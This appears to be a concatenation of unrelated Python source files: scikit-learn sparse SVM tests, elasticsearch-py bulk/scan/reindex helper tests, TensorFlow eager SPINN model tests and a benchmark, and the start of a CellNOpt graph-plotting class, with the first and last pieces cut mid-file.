2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 4, 4, 4])
X = sparse.csr_matrix((data, indices, indptr))
y = np.array(
[1., 0., 2., 2., 1., 1., 1., 2., 2., 0., 1., 2., 2.,
0., 2., 0., 3., 0., 3., 0., 1., 1., 3., 2., 3., 2.,
0., 3., 1., 0., 2., 1., 2., 0., 1., 0., 2., 3., 1.,
3., 0., 1., 0., 0., 2., 0., 1., 2., 2., 2., 3., 2.,
0., 3., 2., 1., 2., 3., 2., 2., 0., 1., 0., 1., 2.,
3., 0., 0., 2., 2., 1., 3., 1., 1., 0., 1., 2., 1.,
1., 3.])
clf = svm.SVC(kernel='linear').fit(X.todense(), y)
sp_clf = svm.SVC(kernel='linear').fit(sparse.coo_matrix(X), y)
assert_array_equal(clf.support_vectors_, sp_clf.support_vectors_.todense())
assert_array_equal(clf.dual_coef_, sp_clf.dual_coef_.todense())
def test_sparse_svc_clone_with_callable_kernel():
# first, test that we raise a value error for "sparse kernels"
# this test is only relevant for the deprecated sparse.SVC class.
with warnings.catch_warnings(record=True):
sp = svm.sparse.SVC(C=1, kernel=lambda x, y: x * y.T, probability=True)
assert_raises(ValueError, sp.fit, X_sp, Y)
# Test that the "dense_fit" is called even though we use sparse input
# meaning that everything works fine.
a = svm.SVC(C=1, kernel=lambda x, y: x * y.T, probability=True)
b = base.clone(a)
b.fit(X_sp, Y)
pred = b.predict(X_sp)
b.predict_proba(X_sp)
dense_svm = svm.SVC(C=1, kernel=lambda x, y: np.dot(x, y.T),
probability=True)
pred_dense = dense_svm.fit(X, Y).predict(X)
assert_array_equal(pred_dense, pred)
# b.decision_function(X_sp) # XXX : should be supported
def test_timeout():
sp = svm.SVC(C=1, kernel=lambda x, y: x * y.T, probability=True,
max_iter=1)
with warnings.catch_warnings(record=True) as foo:
sp.fit(X_sp, Y)
nose_assert_equal(len(foo), 1,
msg=foo)
nose_assert_equal(foo[0].category, ConvergenceWarning,
msg=foo[0].category)
if __name__ == '__main__':
import nose
nose.runmodule()
| |
from elasticsearch import helpers, TransportError
from . import ElasticsearchTestCase
from ..test_cases import SkipTest
class FailingBulkClient(object):
def __init__(self, client, fail_at=1):
self.client = client
self._called = -1
self._fail_at = fail_at
self.transport = client.transport
def bulk(self, *args, **kwargs):
self._called += 1
if self._called == self._fail_at:
raise TransportError(599, "Error!", {})
return self.client.bulk(*args, **kwargs)
class TestStreamingBulk(ElasticsearchTestCase):
def test_actions_remain_unchanged(self):
actions = [{'_id': 1}, {'_id': 2}]
for ok, item in helpers.streaming_bulk(self.client, actions, index='test-index', doc_type='answers'):
self.assertTrue(ok)
self.assertEquals([{'_id': 1}, {'_id': 2}], actions)
def test_all_documents_get_inserted(self):
docs = [{"answer": x, '_id': x} for x in range(100)]
for ok, item in helpers.streaming_bulk(self.client, docs, index='test-index', doc_type='answers', refresh=True):
self.assertTrue(ok)
self.assertEquals(100, self.client.count(index='test-index', doc_type='answers')['count'])
self.assertEquals({"answer": 42}, self.client.get(index='test-index', doc_type='answers', id=42)['_source'])
def test_all_errors_from_chunk_are_raised_on_failure(self):
self.client.indices.create("i",
{
"mappings": {"t": {"properties": {"a": {"type": "integer"}}}},
"settings": {"number_of_shards": 1, "number_of_replicas": 0}
})
self.client.cluster.health(wait_for_status="yellow")
try:
for ok, item in helpers.streaming_bulk(self.client, [{"a": "b"},
{"a": "c"}], index="i", doc_type="t", raise_on_error=True):
self.assertTrue(ok)
except helpers.BulkIndexError as e:
self.assertEquals(2, len(e.errors))
else:
assert False, "exception should have been raised"
def test_different_op_types(self):
if self.es_version < (0, 90, 1):
raise SkipTest('update supported since 0.90.1')
self.client.index(index='i', doc_type='t', id=45, body={})
self.client.index(index='i', doc_type='t', id=42, body={})
docs = [
{'_index': 'i', '_type': 't', '_id': 47, 'f': 'v'},
{'_op_type': 'delete', '_index': 'i', '_type': 't', '_id': 45},
{'_op_type': 'update', '_index': 'i', '_type': 't', '_id': 42, 'doc': {'answer': 42}}
]
for ok, item in helpers.streaming_bulk(self.client, docs):
self.assertTrue(ok)
self.assertFalse(self.client.exists(index='i', doc_type='t', id=45))
self.assertEquals({'answer': 42}, self.client.get(index='i', id=42)['_source'])
self.assertEquals({'f': 'v'}, self.client.get(index='i', id=47)['_source'])
def test_transport_error_can_becaught(self):
failing_client = FailingBulkClient(self.client)
docs = [
{'_index': 'i', '_type': 't', '_id': 47, 'f': 'v'},
{'_index': 'i', '_type': 't', '_id': 45, 'f': 'v'},
{'_index': 'i', '_type': 't', '_id': 42, 'f': 'v'},
]
results = list(helpers.streaming_bulk(failing_client, docs, raise_on_exception=False, raise_on_error=False, chunk_size=1))
self.assertEquals(3, len(results))
self.assertEquals([True, False, True], [r[0] for r in results])
exc = results[1][1]['index'].pop('exception')
self.assertIsInstance(exc, TransportError)
self.assertEquals(599, exc.status_code)
self.assertEquals(
{
'index': {
'_index': 'i',
'_type': 't',
'_id': 45,
'data': {'f': 'v'},
'error': "TransportError(599, 'Error!')",
'status': 599
}
},
results[1][1]
)
class TestBulk(ElasticsearchTestCase):
def test_bulk_works_with_single_item(self):
docs = [{"answer": 42, '_id': 1}]
success, failed = helpers.bulk(self.client, docs, index='test-index', doc_type='answers', refresh=True)
self.assertEquals(1, success)
self.assertFalse(failed)
self.assertEquals(1, self.client.count(index='test-index', doc_type='answers')['count'])
self.assertEquals({"answer": 42}, self.client.get(index='test-index', doc_type='answers', id=1)['_source'])
def test_all_documents_get_inserted(self):
docs = [{"answer": x, '_id': x} for x in range(100)]
success, failed = helpers.bulk(self.client, docs, index='test-index', doc_type='answers', refresh=True)
self.assertEquals(100, success)
self.assertFalse(failed)
self.assertEquals(100, self.client.count(index='test-index', doc_type='answers')['count'])
self.assertEquals({"answer": 42}, self.client.get(index='test-index', doc_type='answers', id=42)['_source'])
def test_stats_only_reports_numbers(self):
docs = [{"answer": x} for x in range(100)]
success, failed = helpers.bulk(self.client, docs, index='test-index', doc_type='answers', refresh=True, stats_only=True)
self.assertEquals(100, success)
self.assertEquals(0, failed)
self.assertEquals(100, self.client.count(index='test-index', doc_type='answers')['count'])
def test_errors_are_reported_correctly(self):
self.client.indices.create("i",
{
"mappings": {"t": {"properties": {"a": {"type": "integer"}}}},
"settings": {"number_of_shards": 1, "number_of_replicas": 0}
})
self.client.cluster.health(wait_for_status="yellow")
success, failed = helpers.bulk(
self.client,
[{"a": 42}, {"a": "c", '_id': 42}],
index="i",
doc_type="t",
raise_on_error=False
)
self.assertEquals(1, success)
self.assertEquals(1, len(failed))
error = failed[0]
self.assertEquals('42', error['index']['_id'])
self.assertEquals('t', error['index']['_type'])
self.assertEquals('i', error['index']['_index'])
print(error['index']['error'])
self.assertTrue('MapperParsingException' in repr(error['index']['error']) or 'mapper_parsing_exception' in repr(error['index']['error']))
def test_error_is_raised(self):
self.client.indices.create("i",
{
"mappings": {"t": {"properties": {"a": {"type": "integer"}}}},
"settings": {"number_of_shards": 1, "number_of_replicas": 0}
})
self.client.cluster.health(wait_for_status="yellow")
self.assertRaises(helpers.BulkIndexError, helpers.bulk,
self.client,
[{"a": 42}, {"a": "c"}],
index="i",
doc_type="t"
)
def test_errors_are_collected_properly(self):
self.client.indices.create("i",
{
"mappings": {"t": {"properties": {"a": {"type": "integer"}}}},
"settings": {"number_of_shards": 1, "number_of_replicas": 0}
})
self.client.cluster.health(wait_for_status="yellow")
success, failed = helpers.bulk(
self.client,
[{"a": 42}, {"a": "c"}],
index="i",
doc_type="t",
stats_only=True,
raise_on_error=False
)
self.assertEquals(1, success)
self.assertEquals(1, failed)
class TestScan(ElasticsearchTestCase):
def test_order_can_be_preserved(self):
bulk = []
for x in range(100):
bulk.append({"index": {"_index": "test_index", "_type": "answers", "_id": x}})
bulk.append({"answer": x, "correct": x == 42})
self.client.bulk(bulk, refresh=True)
docs = list(helpers.scan(self.client, index="test_index", doc_type="answers", size=2, query={"sort": ["answer"]}, preserve_order=True))
self.assertEquals(100, len(docs))
self.assertEquals(list(map(str, range(100))), list(d['_id'] for d in docs))
self.assertEquals(list(range(100)), list(d['_source']['answer'] for d in docs))
def test_all_documents_are_read(self):
bulk = []
for x in range(100):
bulk.append({"index": {"_index": "test_index", "_type": "answers", "_id": x}})
bulk.append({"answer": x, "correct": x == 42})
self.client.bulk(bulk, refresh=True)
docs = list(helpers.scan(self.client, index="test_index", doc_type="answers", size=2))
self.assertEquals(100, len(docs))
self.assertEquals(set(map(str, range(100))), set(d['_id'] for d in docs))
self.assertEquals(set(range(100)), set(d['_source']['answer'] for d in docs))
class TestReindex(ElasticsearchTestCase):
def setUp(self):
super(TestReindex, self).setUp()
bulk = []
for x in range(100):
bulk.append({"index": {"_index": "test_index", "_type": "answers" if x % 2 == 0 else "questions", "_id": x}})
bulk.append({"answer": x, "correct": x == 42})
self.client.bulk(bulk, refresh=True)
def test_reindex_passes_kwargs_to_scan_and_bulk(self):
helpers.reindex(self.client, "test_index", "prod_index", scan_kwargs={'doc_type': 'answers'}, bulk_kwargs={'refresh': True})
self.assertTrue(self.client.indices.exists("prod_index"))
self.assertFalse(self.client.indices.exists_type(index='prod_index', doc_type='questions'))
self.assertEquals(50, self.client.count(index='prod_index', doc_type='answers')['count'])
self.assertEquals({"answer": 42, "correct": True}, self.client.get(index="prod_index", doc_type="answers", id=42)['_source'])
def test_reindex_accepts_a_query(self):
helpers.reindex(self.client, "test_index", "prod_index", query={"query": {"filtered": {"filter": {"term": {"_type": "answers"}}}}})
self.client.indices.refresh()
self.assertTrue(self.client.indices.exists("prod_index"))
self.assertFalse(self.client.indices.exists_type(index='prod_index', doc_type='questions'))
self.assertEquals(50, self.client.count(index='prod_index', doc_type='answers')['count'])
self.assertEquals({"answer": 42, "correct": True}, self.client.get(index="prod_index", doc_type="answers", id=42)['_source'])
def test_all_documents_get_moved(self):
helpers.reindex(self.client, "test_index", "prod_index")
self.client.indices.refresh()
self.assertTrue(self.client.indices.exists("prod_index"))
self.assertEquals(50, self.client.count(index='prod_index', doc_type='questions')['count'])
self.assertEquals(50, self.client.count(index='prod_index', doc_type='answers')['count'])
self.assertEquals({"answer": 42, "correct": True}, self.client.get(index="prod_index", doc_type="answers", id=42)['_source'])
class TestParentChildReindex(ElasticsearchTestCase):
def setUp(self):
super(TestParentChildReindex, self).setUp()
body={
'settings': {"number_of_shards": 1, "number_of_replicas": 0},
'mappings': {
'question': {
},
'answer': {
'_parent': {'type': 'question'},
}
}
}
self.client.indices.create(index='test-index', body=body)
self.client.indices.create(index='real-index', body=body)
self.client.index(
index='test-index',
doc_type='question',
id=42,
body={},
)
self.client.index(
index='test-index',
doc_type='answer',
id=47,
body={'some': 'data'},
parent=42
)
self.client.indices.refresh(index='test-index')
def test_children_are_reindexed_correctly(self):
helpers.reindex(self.client, 'test-index', 'real-index')
q = self.client.get(
index='real-index',
doc_type='question',
id=42,
fields=['_source']
)
if 'fields' in q:
q.update(q.pop('fields'))
self.assertEquals(
{
'_id': '42',
'_index': 'real-index',
'_source': {},
'_type': 'question',
'_version': 1,
'found': True
}, q
)
q = self.client.get(
index='test-index',
doc_type='answer',
id=47,
parent=42,
fields=['_source', '_parent']
)
if 'fields' in q:
q.update(q.pop('fields'))
if '_routing' in q:
self.assertEquals(q.pop('_routing'), '42')
self.assertEquals(
{
'_id': '47',
'_index': 'test-index',
'_source': {'some': 'data'},
'_type': 'answer',
'_version': 1,
'_parent': '42',
'found': True
}, q
)
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import gc
import glob
import os
import shutil
import tempfile
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
# pylint: disable=g-bad-import-order
import tensorflow.contrib.eager as tfe
from tensorflow.contrib.eager.python.examples.spinn import data
from third_party.examples.eager.spinn import spinn
from tensorflow.contrib.summary import summary_test_util
from tensorflow.python.eager import test
from tensorflow.python.framework import test_util
# pylint: enable=g-bad-import-order
def _generate_synthetic_snli_data_batch(sequence_length,
batch_size,
vocab_size):
"""Generate a fake batch of SNLI data for testing."""
with tf.device("cpu:0"):
labels = tf.random_uniform([batch_size], minval=1, maxval=4, dtype=tf.int64)
prem = tf.random_uniform(
(sequence_length, batch_size), maxval=vocab_size, dtype=tf.int64)
prem_trans = tf.constant(np.array(
[[3, 3, 2, 3, 3, 3, 2, 2, 2, 3, 3, 3,
2, 3, 3, 2, 2, 3, 3, 3, 2, 2, 2, 2,
3, 2, 2]] * batch_size, dtype=np.int64).T)
hypo = tf.random_uniform(
(sequence_length, batch_size), maxval=vocab_size, dtype=tf.int64)
hypo_trans = tf.constant(np.array(
[[3, 3, 2, 3, 3, 3, 2, 2, 2, 3, 3, 3,
2, 3, 3, 2, 2, 3, 3, 3, 2, 2, 2, 2,
3, 2, 2]] * batch_size, dtype=np.int64).T)
if tfe.num_gpus():
labels = labels.gpu()
prem = prem.gpu()
prem_trans = prem_trans.gpu()
hypo = hypo.gpu()
hypo_trans = hypo_trans.gpu()
return labels, prem, prem_trans, hypo, hypo_trans
def _test_spinn_config(d_embed, d_out, logdir=None):
config_tuple = collections.namedtuple(
"Config", ["d_hidden", "d_proj", "d_tracker", "predict",
"embed_dropout", "mlp_dropout", "n_mlp_layers", "d_mlp",
"d_out", "projection", "lr", "batch_size", "epochs",
"force_cpu", "logdir", "log_every", "dev_every", "save_every",
"lr_decay_every", "lr_decay_by"])
return config_tuple(
d_hidden=d_embed,
d_proj=d_embed * 2,
d_tracker=8,
predict=False,
embed_dropout=0.1,
mlp_dropout=0.1,
n_mlp_layers=2,
d_mlp=32,
d_out=d_out,
projection=True,
lr=2e-2,
batch_size=2,
epochs=10,
force_cpu=False,
logdir=logdir,
log_every=1,
dev_every=2,
save_every=2,
lr_decay_every=1,
lr_decay_by=0.75)
class SpinnTest(test_util.TensorFlowTestCase):
def setUp(self):
super(SpinnTest, self).setUp()
self._test_device = "gpu:0" if tfe.num_gpus() else "cpu:0"
self._temp_data_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self._temp_data_dir)
super(SpinnTest, self).tearDown()
def testBundle(self):
with tf.device(self._test_device):
lstm_iter = [np.array([[0, 1], [2, 3]], dtype=np.float32),
np.array([[0, -1], [-2, -3]], dtype=np.float32),
np.array([[0, 2], [4, 6]], dtype=np.float32),
np.array([[0, -2], [-4, -6]], dtype=np.float32)]
out = spinn._bundle(lstm_iter)
self.assertEqual(2, len(out))
self.assertEqual(tf.float32, out[0].dtype)
self.assertEqual(tf.float32, out[1].dtype)
self.assertAllEqual(np.array([[0, 2, 0, -2, 0, 4, 0, -4]]).T,
out[0].numpy())
self.assertAllEqual(np.array([[1, 3, -1, -3, 2, 6, -2, -6]]).T,
out[1].numpy())
def testUnbunbdle(self):
with tf.device(self._test_device):
state = [np.array([[0, 1, 2], [3, 4, 5]], dtype=np.float32),
np.array([[0, -1, -2], [-3, -4, -5]], dtype=np.float32)]
out = spinn._unbundle(state)
self.assertEqual(2, len(out))
self.assertEqual(tf.float32, out[0].dtype)
self.assertEqual(tf.float32, out[1].dtype)
self.assertAllEqual(np.array([[0, 1, 2, 0, -1, -2]]),
out[0].numpy())
self.assertAllEqual(np.array([[3, 4, 5, -3, -4, -5]]),
out[1].numpy())
def testReducer(self):
with tf.device(self._test_device):
batch_size = 3
size = 10
tracker_size = 8
reducer = spinn.Reducer(size, tracker_size=tracker_size)
left_in = []
right_in = []
tracking = []
for _ in range(batch_size):
left_in.append(tf.random_normal((1, size * 2)))
right_in.append(tf.random_normal((1, size * 2)))
tracking.append(tf.random_normal((1, tracker_size * 2)))
out = reducer(left_in, right_in, tracking=tracking)
self.assertEqual(batch_size, len(out))
self.assertEqual(tf.float32, out[0].dtype)
self.assertEqual((1, size * 2), out[0].shape)
def testReduceTreeLSTM(self):
with tf.device(self._test_device):
size = 10
tracker_size = 8
reducer = spinn.Reducer(size, tracker_size=tracker_size)
lstm_in = np.array([[0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
[0, -1, -2, -3, -4, -5, -6, -7, -8, -9]],
dtype=np.float32)
c1 = np.array([[0, 1], [2, 3]], dtype=np.float32)
c2 = np.array([[0, -1], [-2, -3]], dtype=np.float32)
h, c = reducer._tree_lstm(c1, c2, lstm_in)
self.assertEqual(tf.float32, h.dtype)
self.assertEqual(tf.float32, c.dtype)
self.assertEqual((2, 2), h.shape)
self.assertEqual((2, 2), c.shape)
def testTracker(self):
with tf.device(self._test_device):
batch_size = 2
size = 10
tracker_size = 8
buffer_length = 18
stack_size = 3
tracker = spinn.Tracker(tracker_size, False)
tracker.reset_state()
# Create dummy inputs for testing.
bufs = []
buf = []
for _ in range(buffer_length):
buf.append(tf.random_normal((batch_size, size * 2)))
bufs.append(buf)
self.assertEqual(1, len(bufs))
self.assertEqual(buffer_length, len(bufs[0]))
self.assertEqual((batch_size, size * 2), bufs[0][0].shape)
stacks = []
stack = []
for _ in range(stack_size):
stack.append(tf.random_normal((batch_size, size * 2)))
stacks.append(stack)
self.assertEqual(1, len(stacks))
self.assertEqual(3, len(stacks[0]))
self.assertEqual((batch_size, size * 2), stacks[0][0].shape)
for _ in range(2):
out1, out2 = tracker(bufs, stacks)
self.assertIsNone(out2)
self.assertEqual(batch_size, len(out1))
self.assertEqual(tf.float32, out1[0].dtype)
self.assertEqual((1, tracker_size * 2), out1[0].shape)
self.assertEqual(tf.float32, tracker.state.c.dtype)
self.assertEqual((batch_size, tracker_size), tracker.state.c.shape)
self.assertEqual(tf.float32, tracker.state.h.dtype)
self.assertEqual((batch_size, tracker_size), tracker.state.h.shape)
def testSPINN(self):
with tf.device(self._test_device):
embedding_dims = 10
d_tracker = 8
sequence_length = 15
num_transitions = 27
config_tuple = collections.namedtuple(
"Config", ["d_hidden", "d_proj", "d_tracker", "predict"])
config = config_tuple(
embedding_dims, embedding_dims * 2, d_tracker, False)
s = spinn.SPINN(config)
# Create some fake data.
buffers = tf.random_normal((sequence_length, 1, config.d_proj))
transitions = tf.constant(
[[3], [3], [2], [3], [3], [3], [2], [2], [2], [3], [3], [3],
[2], [3], [3], [2], [2], [3], [3], [3], [2], [2], [2], [2],
[3], [2], [2]], dtype=tf.int64)
self.assertEqual(tf.int64, transitions.dtype)
self.assertEqual((num_transitions, 1), transitions.shape)
out = s(buffers, transitions, training=True)
self.assertEqual(tf.float32, out.dtype)
self.assertEqual((1, embedding_dims), out.shape)
def testSNLIClassifierAndTrainer(self):
with tf.device(self._test_device):
vocab_size = 40
batch_size = 2
d_embed = 10
sequence_length = 15
d_out = 4
config = _test_spinn_config(d_embed, d_out)
# Create fake embedding matrix.
embed = tf.random_normal((vocab_size, d_embed))
model = spinn.SNLIClassifier(config, embed)
trainer = spinn.SNLIClassifierTrainer(model, config.lr)
(labels, prem, prem_trans, hypo,
hypo_trans) = _generate_synthetic_snli_data_batch(sequence_length,
batch_size,
vocab_size)
# Invoke model under non-training mode.
logits = model(prem, prem_trans, hypo, hypo_trans, training=False)
self.assertEqual(tf.float32, logits.dtype)
self.assertEqual((batch_size, d_out), logits.shape)
# Invoke model under training model.
logits = model(prem, prem_trans, hypo, hypo_trans, training=True)
self.assertEqual(tf.float32, logits.dtype)
self.assertEqual((batch_size, d_out), logits.shape)
# Calculate loss.
loss1 = trainer.loss(labels, logits)
self.assertEqual(tf.float32, loss1.dtype)
self.assertEqual((), loss1.shape)
loss2, logits = trainer.train_batch(
labels, prem, prem_trans, hypo, hypo_trans)
self.assertEqual(tf.float32, loss2.dtype)
self.assertEqual((), loss2.shape)
self.assertEqual(tf.float32, logits.dtype)
self.assertEqual((batch_size, d_out), logits.shape)
# Training on the batch should have led to a change in the loss value.
self.assertNotEqual(loss1.numpy(), loss2.numpy())
def testTrainSpinn(self):
"""Test with fake toy SNLI data and GloVe vectors."""
# 1. Create and load a fake SNLI data file and a fake GloVe embedding file.
snli_1_0_dir = os.path.join(self._temp_data_dir, "snli/snli_1.0")
fake_train_file = os.path.join(snli_1_0_dir, "snli_1.0_train.txt")
os.makedirs(snli_1_0_dir)
# Four sentences in total.
with open(fake_train_file, "wt") as f:
f.write("gold_label\tsentence1_binary_parse\tsentence2_binary_parse\t"
"sentence1_parse\tsentence2_parse\tsentence1\tsentence2\t"
"captionID\tpairID\tlabel1\tlabel2\tlabel3\tlabel4\tlabel5\n")
f.write("neutral\t( ( Foo bar ) . )\t( ( foo . )\t"
"DummySentence1Parse\tDummySentence2Parse\t"
"Foo bar.\tfoo baz.\t"
"4705552913.jpg#2\t4705552913.jpg#2r1n\t"
"neutral\tentailment\tneutral\tneutral\tneutral\n")
f.write("contradiction\t( ( Bar foo ) . )\t( ( baz . )\t"
"DummySentence1Parse\tDummySentence2Parse\t"
"Foo bar.\tfoo baz.\t"
"4705552913.jpg#2\t4705552913.jpg#2r1n\t"
"neutral\tentailment\tneutral\tneutral\tneutral\n")
f.write("entailment\t( ( Quux quuz ) . )\t( ( grault . )\t"
"DummySentence1Parse\tDummySentence2Parse\t"
"Foo bar.\tfoo baz.\t"
"4705552913.jpg#2\t4705552913.jpg#2r1n\t"
"neutral\tentailment\tneutral\tneutral\tneutral\n")
f.write("entailment\t( ( Quuz quux ) . )\t( ( garply . )\t"
"DummySentence1Parse\tDummySentence2Parse\t"
"Foo bar.\tfoo baz.\t"
"4705552913.jpg#2\t4705552913.jpg#2r1n\t"
"neutral\tentailment\tneutral\tneutral\tneutral\n")
glove_dir = os.path.join(self._temp_data_dir, "glove")
os.makedirs(glove_dir)
glove_file = os.path.join(glove_dir, "glove.42B.300d.txt")
words = [".", "foo", "bar", "baz", "quux", "quuz", "grault", "garply"]
with open(glove_file, "wt") as f:
for i, word in enumerate(words):
f.write("%s " % word)
for j in range(data.WORD_VECTOR_LEN):
f.write("%.5f" % (i * 0.1))
if j < data.WORD_VECTOR_LEN - 1:
f.write(" ")
else:
f.write("\n")
vocab = data.load_vocabulary(self._temp_data_dir)
word2index, embed = data.load_word_vectors(self._temp_data_dir, vocab)
train_data = data.SnliData(fake_train_file, word2index)
dev_data = data.SnliData(fake_train_file, word2index)
test_data = data.SnliData(fake_train_file, word2index)
print(embed)
# 2. Create a fake config.
config = _test_spinn_config(
data.WORD_VECTOR_LEN, 4,
logdir=os.path.join(self._temp_data_dir, "logdir"))
# 3. Test training of a SPINN model.
spinn.train_spinn(embed, train_data, dev_data, test_data, config)
# 4. Load train loss values from the summary files and verify that they
# decrease with training.
summary_file = glob.glob(os.path.join(config.logdir, "events.out.*"))[0]
events = summary_test_util.events_from_file(summary_file)
train_losses = [event.summary.value[0].simple_value for event in events
if event.summary.value
and event.summary.value[0].tag == "train/loss"]
self.assertEqual(config.epochs, len(train_losses))
self.assertLess(train_losses[-1], train_losses[0])
class EagerSpinnSNLIClassifierBenchmark(test.Benchmark):
def benchmarkEagerSpinnSNLIClassifier(self):
test_device = "gpu:0" if tfe.num_gpus() else "cpu:0"
with tf.device(test_device):
burn_in_iterations = 2
benchmark_iterations = 10
vocab_size = 1000
batch_size = 128
sequence_length = 15
d_embed = 200
d_out = 4
embed = tf.random_normal((vocab_size, d_embed))
config = _test_spinn_config(d_embed, d_out)
model = spinn.SNLIClassifier(config, embed)
trainer = spinn.SNLIClassifierTrainer(model, config.lr)
(labels, prem, prem_trans, hypo,
hypo_trans) = _generate_synthetic_snli_data_batch(sequence_length,
batch_size,
vocab_size)
for _ in range(burn_in_iterations):
trainer.train_batch(labels, prem, prem_trans, hypo, hypo_trans)
gc.collect()
start_time = time.time()
for _ in xrange(benchmark_iterations):
trainer.train_batch(labels, prem, prem_trans, hypo, hypo_trans)
wall_time = time.time() - start_time
# Named "examples"_per_sec to conform with other benchmarks.
extras = {"examples_per_sec": benchmark_iterations / wall_time}
self.report_benchmark(
name="Eager_SPINN_SNLIClassifier_Benchmark",
iters=benchmark_iterations,
wall_time=wall_time,
extras=extras)
if __name__ == "__main__":
test.main()
| |
# -*- python -*-
#
# This file is part of the cinapps.tcell package
#
# Copyright (c) 2012-2013 - EMBL-EBI
#
# File author(s): Thomas Cokelaer (cokelaer@ebi.ac.uk)
#
# Distributed under the GLPv3 License.
# See accompanying file LICENSE.txt or copy at
# http://www.gnu.org/licenses/gpl-3.0.html
#
# website: www.cellnopt.org
#
##############################################################################
from __future__ import print_function
from matplotlib import colors
import pylab
import networkx as nx
import numpy as np
import pandas as pd
from cno.io.cnograph import CNOGraph
__all__ = ["XCNOGraph"]
class XCNOGraph(CNOGraph):
"""Extra plotting and statistical tools related to CNOGraph"""
def __init__(self, model=None, midas=None, verbose=False):
super(XCNOGraph, self).__init__(model, midas, verbose=verbose)
def hcluster(self):
"""
.. plot::
:include-source:
:width: 50%
from cno import XCNOGraph, cnodata
c = XCNOGraph(cnodata("PKN-ToyPB.sif"), cnodata("MD-ToyPB.csv"))
c.hcluster()
.. warning:: experimental
"""
from scipy.cluster import hierarchy
from scipy.spatial import distance
path_length=nx.all_pairs_shortest_path_length(self.to_undirected())
n = len(self.nodes())
distances=np.zeros((n,n))
nodes = self.nodes()
for u,p in path_length.items():
for v,d in p.items():
distances[nodes.index(u)-1][nodes.index(v)-1] = d
sd = distance.squareform(distances)
hier = hierarchy.average(sd)
pylab.clf();
hierarchy.dendrogram(hier)
pylab.xticks(pylab.xticks()[0], nodes)
def plot_degree_rank(self, loc='upper right', alpha=0.8, markersize=10,
node_size=25, layout='spring', marker='o', color='b'):
"""Plot degree of all nodes
.. plot::
:include-source:
:width: 50%
from cno import XCNOGraph, cnodata
c = XCNOGraph(cnodata("PKN-ToyPB.sif"))
c.plot_degree_rank()
"""
degree_sequence=sorted(nx.degree(self).values(),reverse=True) # degree sequence
pylab.clf()
pylab.loglog(degree_sequence, color+'-', marker=marker,
markersize=markersize)
pylab.title("Degree/rank and undirected graph layout")
pylab.ylabel("Degree")
pylab.xlabel("Rank")
# draw graph in inset
if loc == 'upper right':
pylab.axes([0.45, 0.45, 0.45, 0.45])
else:
pylab.axes([0.1, 0.1, 0.45, 0.45])
UG = self.to_undirected()
Gcc = list(nx.connected_component_subgraphs(UG))
Gcc = Gcc[0]
if layout == 'spring':
pos = nx.spring_layout(Gcc)
else:
pos = nx.circular_layout(Gcc)
pylab.axis('off')
nx.draw_networkx_nodes(Gcc, pos, node_size=node_size)
nx.draw_networkx_edges(Gcc, pos, alpha=alpha)
pylab.grid()
#pylab.show()
def plot_feedback_loops_histogram(self, **kargs):
"""Plots histogram of the cycle lengths found in the graph
:return: list of lists containing all found cycles
"""
data = list(nx.simple_cycles(self))
if len(data):
pylab.hist([len(x) for x in data], **kargs)
pylab.title("Length of the feedback loops")
else:
print('No loop/cycle found')
return data
def plot_in_out_degrees(self, show=True,ax=None, kind='kde'):
"""
.. plot::
:include-source:
:width: 50%
from cno import XCNOGraph, cnodata
c = XCNOGraph(cnodata("PKN-ToyPB.sif"), cnodata("MD-ToyPB.csv"))
c.plot_in_out_degrees()
"""
ts1 = pd.Series(self.in_degree())
ts2 = pd.Series(self.out_degree())
df = pd.DataFrame([ts1, ts2]).transpose()
df.columns = ["in","out"]
if show:
df.plot(kind=kind, ax=ax) # kernerl density estimation (estimiation of histogram)
#df = ...
#df.transpose().hist()
return df
def plot_feedback_loops_species(self, cmap="heat", **kargs):
"""Returns and plots species part of feedback loops
:param str cmap: a color map
:return: dictionary with key (species) and values (number of feedback loop
containing the species) pairs.
.. plot::
:include-source:
:width: 50%
from cno import XCNOGraph, cnodata
c = XCNOGraph(cnodata("PKN-ToyPB.sif"), cnodata("MD-ToyPB.csv"))
c.plot_feedback_loops_species(cmap='heat', colorbar=True)
"""
if len(self) == 0:
self.logging.warning("Empty graph")
return
data = nx.simple_cycles(self)
data = list(pylab.flatten(data))
# FIXME: may not be robust to have "and": could be a valid name
counting = [(x, data.count(x)) for x in self.nodes()
if data.count(x)!=0 and str(x).startswith('and') is False
and self.isand(x) is False]
for node in self.nodes():
self.node[node]['loops'] = 0
if len(counting):
M = float(max([count[1] for count in counting]))
# set a default
#for node in self.nodes():
# self.node[node]['loops'] = "#FFFFFF"
for count in counting:
#ratio_count = sm.to_rgba(count[1]/M)
ratio_count = count[1]/M
colorHex = ratio_count
#self.node[count[0]]['loops'] = colorHex
self.node[count[0]]['loops'] = ratio_count
self.node[count[0]]['style'] = 'filled,bold'
self.plot(node_attribute="loops", cmap=cmap, **kargs)
return counting
def degree_histogram(self, show=True, normed=False):
"""Compute histogram of the node degree (and plots the histogram)
.. plot::
:include-source:
:width: 50%
from cno import XCNOGraph, cnodata
c = XCNOGraph(cnodata("PKN-ToyPB.sif"), cnodata("MD-ToyPB.csv"))
c.degree_histogram()
"""
degree = self.degree().values()
Mdegree = max(degree)
if show == True:
pylab.clf()
res = pylab.hist(degree, bins=range(0,Mdegree+1), align='left',
rwidth=0.8, normed=normed)
xlims = pylab.xlim()
ylims = pylab.ylim()
pylab.axis([0, xlims[1], ylims[0], ylims[1]*1.1])
pylab.grid()
pylab.title("Degree distribution")
return res
def plot_adjacency_matrix(self, fontsize=12, **kargs):
"""Plots adjacency matrix
:param kargs: optional arguments accepted by pylab.pcolor
From the following graph,
.. plot::
:width: 70%
from cno import XCNOGraph, cnodata
